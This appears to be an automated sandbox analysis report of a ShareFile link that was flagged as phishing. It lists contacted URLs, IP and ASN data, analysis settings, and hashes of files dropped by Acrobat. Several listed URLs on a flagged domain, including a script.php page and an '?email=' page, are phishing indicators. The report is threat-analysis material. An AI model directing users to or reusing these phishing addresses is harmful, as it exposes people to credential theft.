                                                                                                                                        https://citrix-sharefile-content.customer.pendo.io/guide-content/eWI7aCe5RTaQQM3QzyK1rqqWcVM/XNJ1F6ATudKnb82a7viL5T2TM6g/E7DHnb1hOIm90y1iNNrpyuqjzow.dom.json?sha256=tTDEghJvK4ZEfjp-b5MZyPzNBxZZo7r5FOjFFYmu8iAfalse
                                                                                                                                          unknown
                                                                                                                                          https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-user-actions-pilet/1.15.0/package/dist/index.jsfalse
                                                                                                                                            unknown
                                                                                                                                            https://bam.nr-data.net/events/1/fd14b65b5e?a=594432325&sa=1&v=1216.487a282&t=Unnamed%20Transaction&rst=66897&ck=1&ref=https://premierbb.sharefile.com/share/view/189361297164461cfalse
                                                                                                                                              unknown
                                                                                                                                              https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-package-pilet/0.37.12/package/dist/main.cssfalse
                                                                                                                                                unknown
                                                                                                                                                https://premierbb.sharefile.com/bundles/92fe442fb8f2d1f7093b.jsfalse
                                                                                                                                                  unknown
                                                                                                                                                  https://premierbb.sharefile.com/bundles/d5a7899d41651404accd.jsfalse
                                                                                                                                                    unknown
                                                                                                                                                    https://bam.nr-data.net/1/fd14b65b5e?a=594432325&sa=1&v=1216.487a282&t=Unnamed%20Transaction&rst=26232&ck=1&ref=https://premierbb.sharefile.com/share/view/189361297164461c&be=952&fe=25337&dc=6057&af=err,xhr,stn,ins,spa&perf=%7B%22timing%22:%7B%22of%22:1728497103288,%22n%22:0,%22f%22:3,%22dn%22:27,%22dne%22:36,%22c%22:36,%22s%22:37,%22ce%22:732,%22rq%22:732,%22rp%22:857,%22rpe%22:1048,%22dl%22:862,%22di%22:5790,%22ds%22:6056,%22de%22:6057,%22dc%22:25337,%22l%22:25337,%22le%22:25341%7D,%22navigation%22:%7B%7D%7D&fp=1699&fcp=2575&jsonp=NREUM.setTokenfalse
                                                                                                                                                      unknown
                                                                                                                                                      https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-resourcegen-pilet/0.1.36/package/dist/main.cssfalse
                                                                                                                                                        unknown
                                                                                                                                                        https://premierbb.sharefile.com/android-chrome-192x192.pngfalse
                                                                                                                                                          unknown
                                                                                                                                                          https://hrv56k8ryi.ferrovelho.shop/m/script.phpfalse
                                                                                                                                                            unknown
                                                                                                                                                            https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-rubicon-pilet/0.33.3/package/dist/index.jsfalse
                                                                                                                                                              unknown
                                                                                                                                                              https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-tenant-mgt-pilet/1.2.0/package/dist/main.cssfalse
                                                                                                                                                                unknown
                                                                                                                                                                https://premierbb.sharefile.com/css/sharefilebrand/sf-spinner.svgfalse
                                                                                                                                                                  unknown
                                                                                                                                                                  https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-task-aggregator-pilet/1.0.7/package/dist/index.jsfalse
                                                                                                                                                                    unknown
                                                                                                                                                                    https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-dc-pilet/1.379.0/package/dist/index.jsfalse
                                                                                                                                                                      unknown
                                                                                                                                                                      https://o49063.ingest.sentry.io/api/4506735163932672/envelope/?sentry_key=0be0069dd70d0ce2c63c650418f56fa6&sentry_version=7&sentry_client=sentry.javascript.react%2F7.100.1false
                                                                                                                                                                        unknown
                                                                                                                                                                        https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-dynamic-forms-pilet/1.25.0/package/dist/af15e31c70fab7cfd55c.woff2false
                                                                                                                                                                          unknown
                                                                                                                                                                          https://hrv56k8ryi.ferrovelho.shop/m/ic/RURBAM6XT5AFWTUO9JJWXDBG5false
                                                                                                                                                                            unknown
                                                                                                                                                                            https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-billing-pilet/0.1.121/package/dist/index.jsfalse
                                                                                                                                                                              unknown
                                                                                                                                                                              https://hrv56k8ryi.ferrovelho.shop/?email=false
                                                                                                                                                                                unknown
                                                                                                                                                                                https://hrv56k8ryi.ferrovelho.shop/m/86efbfca1e206ccf7a31f8b3bf14aa5e.htm#true
                                                                                                                                                                                  unknown
                                                                                                                                                                                  https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-entitlements-pilet/0.1.54/package/dist/main.cssfalse
                                                                                                                                                                                    unknown
                                                                                                                                                                                    https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-user-act-hist-pilet/1.7.0/package/dist/index.jsfalse
                                                                                                                                                                                      unknown
                                                                                                                                                                                      https://0093b71e39a6.11de9b12.us-east-1.token.awswaf.com/0093b71e39a6/478ed03bbf12/verifyfalse
                                                                                                                                                                                        unknown
                                                                                                                                                                                        https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-task-mgt-pilet/1.7.0/package/dist/main.cssfalse
                                                                                                                                                                                          unknown
                                                                                                                                                                                          https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-view-user-pilet/1.8.0/package/dist/index.jsfalse
                                                                                                                                                                                            unknown
                                                                                                                                                                                            https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-dynamic-forms-pilet/1.25.0/package/dist/main.cssfalse
                                                                                                                                                                                              unknown
                                                                                                                                                                                              https://citrix-sharefile-data.customer.pendo.io/data/guide.gif/74b07336-7560-45fc-7cd1-95032a784d52?jzb=eJwFwIEIAAAAwDDQd3-N1QABFQC5&ct=1728497131246&v=2.249.1_prodfalse
                                                                                                                                                                                                unknown
                                                                                                                                                                                                https://premierbb.sf-api.com/sf/v3/Items/ContentViewerfalse
                                                                                                                                                                                                  unknown
                                                                                                                                                                                                  https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-audit-collector-pilet/0.11.0/package/dist/index.jsfalse
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-dynamic-forms-pilet/1.25.0/package/dist/402b74053d26323596b3.woff2false
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      https://0093b71e39a6.11de9b12.us-east-1.token.awswaf.com/0093b71e39a6/478ed03bbf12/telemetryfalse
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        https://premierbb.sharefile.com/bundles/102a12cf4db82175eb4a.jsfalse
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          https://premierbb.sharefile.com/css/spinner.cssfalse
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            https://0093b71e39a6.11de9b12.us-east-1.token.awswaf.com/0093b71e39a6/478ed03bbf12/challenge.jsfalse
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-client-dashboard/0.164.0/package/dist/main.cssfalse
                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-permissions-pilet/1.118.31/package/dist/index.jsfalse
                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                  https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-integrations-pilet/0.0.175/package/dist/main.cssfalse
                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                    https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-templates-pilet/0.108.2/package/dist/main.cssfalse
                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                      http://builder-assets.unbounce.com/published-js/main.bundle-ef43f79.z.jsfalse
                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                        https://premierbb.sf-api.com/sf/v3/Accounts/Brandingfalse
                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                          https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-notification-center/0.58.0/package/dist/index.jsfalse
                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                            https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-workflows-pilet/0.119.14/package/dist/index.jsfalse
                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                              https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-storage-plugin-pilet/1.280.0/package/dist/main.cssfalse
                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-threatalert-mgt-pilet/1.14.0/package/dist/citrite-citrix-ui.jsfalse
                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                  http://unbouncepages.com/_ub/static/ts/e6c35f50fd3355ae56cc4292c3ae66e2e57ced28.jsfalse
                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                    https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-audit-collector-pilet/0.11.0/package/dist/main.cssfalse
                                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                                      https://premierbb.sharefile.com/manifest.jsonfalse
                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                        https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-view-user-pilet/1.8.0/package/dist/main.cssfalse
                                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                                          https://premierbb.sharefile.com/bundles/2efeefafc2bb68a97d33.jsfalse
                                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                                            https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-dynamic-forms-pilet/1.25.0/package/dist/index.jsfalse
                                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                                              https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-rubicon-pilet/0.33.3/package/dist/main.cssfalse
                                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                                https://premierbb.sharefile.com/bundles/5be3ba1b444ac539eaf5.jsfalse
                                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                                  https://hrv56k8ryi.ferrovelho.shop/m/mxl/mlg.svg?RHI7QEQ4V0EAB9E08G4TRBZQTfalse
                                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                                    https://citrix-sharefile-content.customer.pendo.io/guide.-323232.1622565221517.cssfalse
                                                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                                                      https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-entitlements-pilet/0.1.54/package/dist/index.jsfalse
                                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                                        https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-billing-pilet/0.1.121/package/dist/main.cssfalse
                                                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                                                          NameSourceMaliciousAntivirus DetectionReputation
                                                                                                                                                                                                                                                          http://premierbb.sharefile.com/share/view/189361297164461cchromecache_469.2.dr, chromecache_453.2.drfalse
                                                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                                                            https://citrix-sharefile-content.customer.pendo.io/guide-content/wotSbq5SNToNGIBxeYKbdsIn35Qchromecache_453.2.drfalse
                                                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                                                              https://github.com/twbs/bootstrap/graphs/contributors)chromecache_508.2.dr, chromecache_482.2.drfalse
                                                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                                                https://agent.pendo.io/licenseschromecache_426.2.dr, chromecache_501.2.drfalse
                                                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                                                  https://citrix-sharefile-content.customer.pendo.io/guide-content/u6RYL2wEa9xrpUJMTeOXl41AeJI/qrJmWADchromecache_453.2.drfalse
                                                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                                                    https://citrix-sharefile-content.customer.pendo.io/guide-content/qgx_AaYBkGN6StQWJLhgBhCmZsY/ZEFqtCHchromecache_453.2.drfalse
                                                                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                                                                      https://citrix-sharefile-content.customer.pendo.io/guide-content/kRiIYerdgZdzqYlUiCx61iLjnBU/vJf7TMDchromecache_453.2.drfalse
                                                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                                                        https://citrix-sharefile-content.customer.pendo.io/guide-content/DGXiXepNeRvpgcvqVVwgerMyl9c/FzHL74Wchromecache_453.2.drfalse
                                                                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                                                                          https://citrix-sharefile-content.customer.pendo.io/guide-content/z6GAMp5KCypHWLnasLOIn0RVcPQ/vzuAMPtchromecache_453.2.drfalse
                                                                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                                                                            https://citrix-sharefile-content.customer.pendo.io/guide-content/freMllnYvBAwsP7Q8plLkQuQk9o/iIvmdJJchromecache_453.2.drfalse
                                                                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                                                                              https://citrix-sharefile-content.customer.pendo.io/agent/static/74b07336-7560-45fc-7cd1-95032a784d52chromecache_426.2.dr, chromecache_501.2.drfalse
                                                                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                                                                • No. of IPs < 25%
                                                                                                                                                                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                                                                • 75% < No. of IPs
                                                                                                                                                                                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                                                                18.173.205.91
                                                                                                                                                                                                                                                                                0093b71e39a6.11de9b12.us-east-1.token.awswaf.comUnited States
                                                                                                                                                                                                                                                                                3MIT-GATEWAYSUSfalse
                                                                                                                                                                                                                                                                                13.224.189.109
                                                                                                                                                                                                                                                                                piletfeed-cdn.sharefile.ioUnited States
                                                                                                                                                                                                                                                                                16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                104.26.12.205
                                                                                                                                                                                                                                                                                unknownUnited States
                                                                                                                                                                                                                                                                                13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                                52.217.235.169
                                                                                                                                                                                                                                                                                s3-w.us-east-1.amazonaws.comUnited States
                                                                                                                                                                                                                                                                                16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                52.23.25.235
                                                                                                                                                                                                                                                                                events.launchdarkly.comUnited States
                                                                                                                                                                                                                                                                                14618AMAZON-AESUSfalse
                                                                                                                                                                                                                                                                                34.111.138.51
                                                                                                                                                                                                                                                                                51.138.111.34.bc.googleusercontent.comUnited States
                                                                                                                                                                                                                                                                                15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                239.255.255.250
                                                                                                                                                                                                                                                                                unknownReserved
                                                                                                                                                                                                                                                                                unknownunknownfalse
                                                                                                                                                                                                                                                                                142.250.185.196
                                                                                                                                                                                                                                                                                www.google.comUnited States
                                                                                                                                                                                                                                                                                15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                172.64.153.235
                                                                                                                                                                                                                                                                                unknownUnited States
                                                                                                                                                                                                                                                                                13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                                104.18.34.21
                                                                                                                                                                                                                                                                                unbouncepages.comUnited States
                                                                                                                                                                                                                                                                                13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                                13.248.193.251
                                                                                                                                                                                                                                                                                premierbb.sharefile.comUnited States
                                                                                                                                                                                                                                                                                16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                15.197.239.217
                                                                                                                                                                                                                                                                                sf-renderx-us-east-1.sharefile.comUnited States
                                                                                                                                                                                                                                                                                7430TANDEMUSfalse
                                                                                                                                                                                                                                                                                162.247.243.39
                                                                                                                                                                                                                                                                                js-agent.newrelic.comUnited States
                                                                                                                                                                                                                                                                                13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                                104.26.13.205
                                                                                                                                                                                                                                                                                api.ipify.orgUnited States
                                                                                                                                                                                                                                                                                13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                                203.161.61.149
                                                                                                                                                                                                                                                                                hrv56k8ryi.ferrovelho.shopMalaysia
                                                                                                                                                                                                                                                                                45899VNPT-AS-VNVNPTCorpVNtrue
                                                                                                                                                                                                                                                                                172.64.41.3
                                                                                                                                                                                                                                                                                chrome.cloudflare-dns.comUnited States
                                                                                                                                                                                                                                                                                13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                                172.67.157.100
                                                                                                                                                                                                                                                                                unknownUnited States
                                                                                                                                                                                                                                                                                13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                                13.224.189.115
                                                                                                                                                                                                                                                                                unknownUnited States
                                                                                                                                                                                                                                                                                16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                34.107.204.85
                                                                                                                                                                                                                                                                                85.204.107.34.bc.googleusercontent.comUnited States
                                                                                                                                                                                                                                                                                15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                18.173.205.42
                                                                                                                                                                                                                                                                                unknownUnited States
                                                                                                                                                                                                                                                                                3MIT-GATEWAYSUSfalse
                                                                                                                                                                                                                                                                                18.173.205.84
                                                                                                                                                                                                                                                                                d274vr1q96ipg8.cloudfront.netUnited States
                                                                                                                                                                                                                                                                                3MIT-GATEWAYSUSfalse
                                                                                                                                                                                                                                                                                13.224.189.30
                                                                                                                                                                                                                                                                                builder-assets.unbounce.comUnited States
                                                                                                                                                                                                                                                                                16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                3.33.222.159
                                                                                                                                                                                                                                                                                unknownUnited States
                                                                                                                                                                                                                                                                                8987AMAZONEXPANSIONGBfalse
                                                                                                                                                                                                                                                                                18.239.83.12
                                                                                                                                                                                                                                                                                0093b71e39a6.us-east-1.sdk.awswaf.comUnited States
                                                                                                                                                                                                                                                                                16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                142.250.181.228
                                                                                                                                                                                                                                                                                unknownUnited States
                                                                                                                                                                                                                                                                                15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                162.247.243.29
                                                                                                                                                                                                                                                                                fastly-tls12-bam.nr-data.netUnited States
                                                                                                                                                                                                                                                                                13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                                76.223.1.166
                                                                                                                                                                                                                                                                                sf-cv.sharefile.comUnited States
                                                                                                                                                                                                                                                                                16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                34.120.195.249
                                                                                                                                                                                                                                                                                o49063.ingest.sentry.ioUnited States
                                                                                                                                                                                                                                                                                15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                IP
                                                                                                                                                                                                                                                                                192.168.2.4
                                                                                                                                                                                                                                                                                192.168.2.6
                                                                                                                                                                                                                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                                                                                Analysis ID:1530187
                                                                                                                                                                                                                                                                                Start date and time:2024-10-09 20:04:10 +02:00
                                                                                                                                                                                                                                                                                Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                                                                Overall analysis duration:0h 6m 25s
                                                                                                                                                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                                                                Report type:full
                                                                                                                                                                                                                                                                                Cookbook file name:browseurl.jbs
                                                                                                                                                                                                                                                                                Sample URL:https://premierbb.sharefile.com/public/share/web-189361297164461c
                                                                                                                                                                                                                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                                                                Number of analysed new started processes analysed:16
                                                                                                                                                                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                                                                                                                                                Number of injected processes analysed:0
                                                                                                                                                                                                                                                                                Technologies:
                                                                                                                                                                                                                                                                                • EGA enabled
                                                                                                                                                                                                                                                                                • AMSI enabled
                                                                                                                                                                                                                                                                                Analysis Mode:default
                                                                                                                                                                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                                                                                                                                                                Detection:MAL
                                                                                                                                                                                                                                                                                Classification:mal84.phis.win@78/244@97/30
                                                                                                                                                                                                                                                                                Cookbook Comments:
                                                                                                                                                                                                                                                                                • Found PDF document
                                                                                                                                                                                                                                                                                • URL browsing timeout or error
                                                                                                                                                                                                                                                                                • Close Viewer
                                                                                                                                                                                                                                                                                • URL not reachable
                                                                                                                                                                                                                                                                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                                                                                                                                                                                                                                • Excluded IPs from analysis (whitelisted): 142.250.185.238, 142.250.185.195, 66.102.1.84, 34.104.35.123, 151.101.2.217, 151.101.66.217, 151.101.130.217, 151.101.194.217, 192.229.221.95, 199.232.210.172, 142.250.186.138, 142.250.185.202, 142.250.186.74, 216.58.206.74, 142.250.186.170, 142.250.185.138, 142.250.185.170, 142.250.185.106, 142.250.184.202, 142.250.185.74, 142.250.185.234, 172.217.16.202, 216.58.206.42, 172.217.18.10, 172.217.18.106, 142.250.186.106, 172.217.16.131, 93.184.221.240, 104.77.16.4, 18.207.85.246, 34.193.227.236, 54.144.73.197, 107.22.247.231, 2.19.126.143, 2.19.126.149, 2.23.197.184, 142.250.186.67, 142.250.185.110, 104.18.186.31, 104.18.187.31, 172.217.23.106, 142.250.181.234, 216.58.212.170, 142.250.186.42, 172.217.16.138, 142.250.184.234, 23.192.153.142, 142.250.74.202, 142.250.186.131, 23.46.224.249, 142.250.64.99, 142.250.65.195, 23.200.196.138
                                                                                                                                                                                                                                                                                • Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, cdn.jsdelivr.net.cdn.cloudflare.net, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, e4578.dscb.akamaiedge.net, clientservices.googleapis.com, acroipm2.adobe.com, clients2.google.com, ocsp.digicert.com, ssl-delivery.adobe.com.edgekey.net, a122.dscd.akamai.net, update.googleapis.com, www.gstatic.com, c3.shared.global.fastly.net, crl.root-x1.letsencrypt.org.edgekey.net, optimizationguide-pa.googleapis.com, client.wns.windows.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, otelrules.azureedge.net, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, p13n.adobe.io, fe3cr.delivery.mp.microsoft.com, ssl.adobe.com.edgekey.net, edgedl.me.gvt1.com, armmf.adobe.com, clients.l.google.com, geo2.adobe.com
                                                                                                                                                                                                                                                                                • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                                                                                • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                                                                                                                                                                                • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                                                                                                                                                • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                                                                                                                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                                                                • VT rate limit hit for: https://premierbb.sharefile.com/public/share/web-189361297164461c
                                                                                                                                                                                                                                                                                TimeTypeDescription
                                                                                                                                                                                                                                                                                14:06:34API Interceptor1x Sleep call for process: AcroCEF.exe modified
                                                                                                                                                                                                                                                                                No context
                                                                                                                                                                                                                                                                                No context
                                                                                                                                                                                                                                                                                No context
                                                                                                                                                                                                                                                                                No context
                                                                                                                                                                                                                                                                                No context
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):295
                                                                                                                                                                                                                                                                                Entropy (8bit):5.116464352960292
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:6:pUpM+q2PN72nKuAl9OmbnIFUt88waXZmw+8waqMVkwON72nKuAl9OmbjLJ:pUpM+vVaHAahFUt88t/+8IMV5OaHAaSJ
                                                                                                                                                                                                                                                                                MD5:16DBBCD5F71B82935895E0EE156248A8
                                                                                                                                                                                                                                                                                SHA1:6CFC397E029C07E810E966D1F39F9D8213D2D144
                                                                                                                                                                                                                                                                                SHA-256:6D9CBD177F02BB362D1573EFE614E8DA38B33273BB4D3EC5438E36AB53E764A5
                                                                                                                                                                                                                                                                                SHA-512:E30E6A0F4D16E756A5DDCCBC4B65015970BC091E397D1D9E274CD18B81BDFE27FC06AF30D6B686DB38512ED2FD94929814CC4D80807DC590CDFAF90175DA1E16
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:2024/10/09-14:06:22.022 1fc Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/10/09-14:06:22.024 1fc Recovering log #3.2024/10/09-14:06:22.024 1fc Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):295
                                                                                                                                                                                                                                                                                Entropy (8bit):5.116464352960292
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:6:pUpM+q2PN72nKuAl9OmbnIFUt88waXZmw+8waqMVkwON72nKuAl9OmbjLJ:pUpM+vVaHAahFUt88t/+8IMV5OaHAaSJ
                                                                                                                                                                                                                                                                                MD5:16DBBCD5F71B82935895E0EE156248A8
                                                                                                                                                                                                                                                                                SHA1:6CFC397E029C07E810E966D1F39F9D8213D2D144
                                                                                                                                                                                                                                                                                SHA-256:6D9CBD177F02BB362D1573EFE614E8DA38B33273BB4D3EC5438E36AB53E764A5
                                                                                                                                                                                                                                                                                SHA-512:E30E6A0F4D16E756A5DDCCBC4B65015970BC091E397D1D9E274CD18B81BDFE27FC06AF30D6B686DB38512ED2FD94929814CC4D80807DC590CDFAF90175DA1E16
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:2024/10/09-14:06:22.022 1fc Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/10/09-14:06:22.024 1fc Recovering log #3.2024/10/09-14:06:22.024 1fc Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):342
                                                                                                                                                                                                                                                                                Entropy (8bit):5.161918511528234
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:6:p4pt+q2PN72nKuAl9Ombzo2jMGIFUt88N5Zmw+8ejVkwON72nKuAl9Ombzo2jMmd:p4povVaHAa8uFUt88N5/+865OaHAa8RJ
                                                                                                                                                                                                                                                                                MD5:3C68C5B214E246D06C5F4CD8AAC2EFE6
                                                                                                                                                                                                                                                                                SHA1:3A19FD43DD129766E42585951CB7D30A318B8612
                                                                                                                                                                                                                                                                                SHA-256:00B44CA524F87895FBF90E012321C03DA3622AAD6D4DD52CE6542BD5ECA8687F
                                                                                                                                                                                                                                                                                SHA-512:3576AF71F9DB38CEAF252C220A3E0175A8BC05ACCFD56B2A1B398B9A0603E87ED71EC92B39BC98C3993295F8F54C5D9C93DE5F673016921CF9F7590FBB9E7EB1
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:2024/10/09-14:06:22.120 1788 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/10/09-14:06:22.121 1788 Recovering log #3.2024/10/09-14:06:22.122 1788 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):342
                                                                                                                                                                                                                                                                                Entropy (8bit):5.161918511528234
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:6:p4pt+q2PN72nKuAl9Ombzo2jMGIFUt88N5Zmw+8ejVkwON72nKuAl9Ombzo2jMmd:p4povVaHAa8uFUt88N5/+865OaHAa8RJ
                                                                                                                                                                                                                                                                                MD5:3C68C5B214E246D06C5F4CD8AAC2EFE6
                                                                                                                                                                                                                                                                                SHA1:3A19FD43DD129766E42585951CB7D30A318B8612
                                                                                                                                                                                                                                                                                SHA-256:00B44CA524F87895FBF90E012321C03DA3622AAD6D4DD52CE6542BD5ECA8687F
                                                                                                                                                                                                                                                                                SHA-512:3576AF71F9DB38CEAF252C220A3E0175A8BC05ACCFD56B2A1B398B9A0603E87ED71EC92B39BC98C3993295F8F54C5D9C93DE5F673016921CF9F7590FBB9E7EB1
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
